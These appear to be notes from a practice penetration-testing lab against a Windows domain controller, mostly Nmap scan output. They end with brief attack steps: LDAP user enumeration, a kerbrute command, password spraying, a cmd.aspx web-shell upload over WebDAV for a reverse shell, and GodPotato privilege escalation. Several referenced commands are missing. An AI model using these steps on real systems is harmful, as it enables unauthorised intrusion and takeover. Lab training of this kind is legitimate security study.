Date
Mar 26, 2025 → Mar 26, 2025
Tag
Nmap
User Enumeration
LDAP Enumeration
192.168.108.122
Nmap
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 02:57 EDT
Nmap scan report for 192.168.108.122
Host is up (0.057s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 26.70 seconds
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 02:57 EDT
Nmap scan report for 192.168.108.122
Host is up (0.059s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49692/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.56 seconds
└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 02:59 EDT
Nmap scan report for 192.168.108.122
Host is up (0.062s latency).
Not shown: 65514 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Type: Microsoft-IIS/10.0
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Server Date: Wed, 26 Mar 2025 07:02:22 GMT
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-26 07:01:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (
Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49768/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-26T07:02:23
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 243.46 seconds
└─# nmap $ip --script=msrpc-enum
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 03:08 EDT
Nmap scan report for 192.168.108.122
Host is up (0.058s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Host script results:
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds
hostname = hutch & domain = hutch.offsec
Administrator, Users, hutch.offsecdn: CN=Administrator,CN=Users,DC=hutch,DC=offsec
80
Nothing found in path enumeration
139,445
nothing
5895
Nothing found in path enumeration
LDAP Enumeration
use this command to list out user in the domain and we found this
we have the password of user fmcsorley and we can list all user out
try to run kerbrute to check if pre-auth is off for any users
if pre-auth is disable we may be able to kerberoast for domain credentials
../kerbrute_linux_amd64 userenum -d hutch.offsec --dc $ip users
to spray the password
Access the webdav server using Cadaver:
Upload the cmd.aspx file and attempt to execute our reverse shell through it
and then we got it in
PE
we can see this privilege is enabled, so use godpotato to PE
